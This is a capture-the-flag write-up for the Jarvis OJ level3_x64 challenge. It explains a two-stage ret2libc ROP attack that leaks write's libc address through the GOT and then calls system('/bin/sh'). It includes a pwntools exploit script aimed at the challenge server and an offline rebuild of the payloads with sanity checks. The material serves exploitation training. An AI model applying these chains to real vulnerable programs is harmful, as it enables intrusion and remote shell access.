Jarvis OJ---level3_x64

Author: yahoo0o0 | Published 2017-09-24 16:42

    Like level2_x64, this is a 64-bit binary, but the program neither calls system directly nor contains a "/bin/sh" string; all we get is the libc it runs against. So we have to leak an address out of libc, compute the libc base from the known offset of that symbol, and from the base derive the addresses of system and of the "/bin/sh" string that libc itself carries. As in level2_x64, the obstacle is the x86-64 calling convention: arguments travel in rdi, rsi and rdx rather than on the stack, so we need gadgets to load them. The two we use come from the tail of __libc_csu_init: "pop rdi; ret" at 0x4006b3 and "pop rsi; pop r15; ret" at 0x4006b1 (the second one pops an extra junk qword into r15). The attack is a two-stage ROP chain: stage 1 calls write(1, write@got, rdx) to print write's resolved libc address and then returns to _start so the program runs again and we get a second overflow; stage 2 calls system("/bin/sh") followed by exit. Two details to keep in mind: the chain never sets rdx, it relies on rdx still holding a non-zero length left over from the program's own read call, which is why write dumps more than 8 bytes and the script keeps only the first 8; and although one could also read "/bin/sh" into .bss, the script below simply uses the copy inside libc, whose offset is found with strings.

    from pwn import *

    p = remote('pwn2.jarvisoj.com', 9883)

    # Addresses inside the (non-PIE) binary
    write_plt = 0x4004B0
    write_got = 0x600A58
    poprdiret = 0x4006B3   # pop rdi; ret         (tail of __libc_csu_init)
    poprsiret = 0x4006B1   # pop rsi; pop r15; ret
    start = 0x4004F0       # _start: restart the program after the leak

    # Offsets inside the provided libc-2.19.so
    write_libc_address = 0xEB700     # readelf -a ./libc-2.19.so | grep " write@"
    bin_sh_libc_address = 0x17C8C3   # strings -a -t x libc-2.19.so | grep "/bin/sh"
    system_libc_address = 0x46590    # readelf -a ./libc-2.19.so | grep " system@"
    exit_libc_address = 0x3C1E0      # readelf -a ./libc-2.19.so | grep " exit@"

    # Stage 1: overflow the 0x80-byte buffer plus saved rbp, then
    # write(1, write@got, rdx) and return to _start for a second overflow
    payload1 = b'\x00' * (0x80 + 8)
    payload1 += p64(poprdiret) + p64(1)                    # rdi = 1 (stdout)
    payload1 += p64(poprsiret) + p64(write_got) + p64(1)   # rsi = write@got, r15 = junk
    payload1 += p64(write_plt)
    payload1 += p64(start)
    p.recvuntil(b"Input:\n")
    p.sendline(payload1)
    leak = u64(p.recv(8))   # write dumps rdx bytes; the first 8 are write@libc
    log.info("write@libc = %#x" % leak)

    libc_base = leak - write_libc_address
    system_addr = libc_base + system_libc_address
    binsh = libc_base + bin_sh_libc_address
    exit_addr = libc_base + exit_libc_address

    # Stage 2: system("/bin/sh"), then exit so the process ends cleanly
    payload2 = b'a' * (0x80 + 8) + p64(poprdiret) + p64(binsh) + p64(system_addr) + p64(exit_addr)
    p.recvuntil(b"Input:\n")
    p.sendline(payload2)
    p.interactive()
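The following is an added example, not part of the original write-up: the same two-stage chain rebuilt with plain struct so it runs offline, without pwntools and without the remote service. It builds both payloads from the addresses above, resolves libc addresses from a GOT dump, and adds the two sanity checks a practitioner wants before sending stage 2: the leaked value must look like a userspace libc address, and the computed base must be page-aligned (an unaligned base almost always means the wrong libc or the wrong symbol offset). The libc base 0x7ffff7a0d000 and the trailing GOT bytes in SAMPLE_DUMP are constructed for the demonstration; the gadget byte encodings in the comments are the standard x86-64 encodings of the __libc_csu_init epilogue.

```python
import struct

# Constants copied from the write-up: the binary is non-PIE, so its
# gadget/PLT/GOT addresses are fixed; the LIBC_* values are offsets
# into the provided libc-2.19.so.
WRITE_PLT = 0x4004B0
WRITE_GOT = 0x600A58
POP_RDI_RET = 0x4006B3          # bytes "5f c3"       -> pop rdi; ret
POP_RSI_R15_RET = 0x4006B1      # bytes "5e 41 5f c3" -> pop rsi; pop r15; ret
START = 0x4004F0
OVERFLOW = 0x80 + 8             # 0x80-byte buffer plus saved rbp

LIBC_WRITE = 0xEB700
LIBC_SYSTEM = 0x46590
LIBC_BINSH = 0x17C8C3
LIBC_EXIT = 0x3C1E0


def p64(v):
    return struct.pack("<Q", v)


def u64(b):
    return struct.unpack("<Q", b[:8])[0]


def leak_chain():
    """Stage 1: write(1, write@got, rdx), then return to _start.

    rdx is never set; the chain relies on it still holding the count from
    the program's preceding read(), so write() dumps more than 8 bytes.
    """
    chain = [
        POP_RDI_RET, 1,                  # rdi = 1 (stdout)
        POP_RSI_R15_RET, WRITE_GOT, 0,   # rsi = write@got, r15 = junk
        WRITE_PLT,                       # call write through the PLT
        START,                           # restart the program for stage 2
    ]
    return b"\x00" * OVERFLOW + b"".join(p64(x) for x in chain)


def resolve_libc(dump):
    """Turn the bytes write() sent back into absolute libc addresses.

    Only the first 8 bytes are write@libc; the rest is the remainder of
    the GOT. Sanity-check the leak before firing stage 2.
    """
    leak = u64(dump)
    base = leak - LIBC_WRITE
    if not (0x7F0000000000 <= leak < 0x800000000000):
        raise ValueError("leak %#x does not look like a userspace libc address" % leak)
    if base & 0xFFF:
        raise ValueError("libc base %#x is not page-aligned: wrong libc or wrong offset" % base)
    return {
        "base": base,
        "system": base + LIBC_SYSTEM,
        "binsh": base + LIBC_BINSH,
        "exit": base + LIBC_EXIT,
    }


def shell_chain(addrs):
    """Stage 2: system("/bin/sh"); exit()."""
    chain = [POP_RDI_RET, addrs["binsh"], addrs["system"], addrs["exit"]]
    return b"a" * OVERFLOW + b"".join(p64(x) for x in chain)


# Constructed sample (not a real capture): pretend libc was mapped at
# FAKE_BASE, so write@got holds FAKE_BASE + LIBC_WRITE, followed by filler
# standing in for the other GOT entries that write() also dumps.
FAKE_BASE = 0x7FFFF7A0D000
SAMPLE_DUMP = p64(FAKE_BASE + LIBC_WRITE) + p64(0x4141414141414141) * 3

if __name__ == "__main__":
    addrs = resolve_libc(SAMPLE_DUMP)
    for name, value in addrs.items():
        print("%-6s %#x" % (name, value))
    print("stage1 %d bytes, stage2 %d bytes" % (len(leak_chain()), len(shell_chain(addrs))))
```

Against a live target you would replace SAMPLE_DUMP with whatever the socket returns after stage 1; if resolve_libc raises, stop rather than send stage 2, because a bad base turns system and "/bin/sh" into garbage pointers and you only get a crash.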
    

Article link: https://www.haomeiwen.com/subject/fgetextx.html